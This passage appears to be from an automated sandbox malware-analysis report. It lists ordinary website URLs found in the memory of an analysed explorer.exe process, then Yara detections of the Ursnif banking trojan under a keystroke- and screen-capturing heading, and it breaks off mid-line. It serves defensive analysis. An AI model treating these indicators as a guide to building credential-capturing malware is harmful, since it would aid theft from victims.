              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://rover.ebay.com
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.about.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.in/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.auone.jp/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.de/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.es/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.in/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.it/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.interpark.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.nate.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.nifty.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.sify.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.yam.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://suche.aol.de/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
              Source: explorer.exe, 0000001B.00000000.918639012.0000000006AD0000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://web.ask.com/
              Source: explorer.exe, 0000001B.00000000.918639012.0000000006AD0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.com
              Source: explorer.exe, 0000001B.00000000.904431386.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.de/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.923197016.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.ask.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.923197016.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico

              Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match; file source: 3.3.rundll32.exe.58994a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; file source: 00000003.00000003.831952409.0000000005899000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; file source: 00000000.00000002.917944713.0000000003698000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; file source: 00000003.00000003.818012728.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; file source: 00000003.00000003.817964029.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; file source: 00000000.00000003.872375871.0000000003698000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; file source: 00000000.00000003.872502118.0000000003698000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; file source: 00000000.00000003.872568970.0000000003698000.00000004.00000040.sdmp, type: MEMORY
              Source: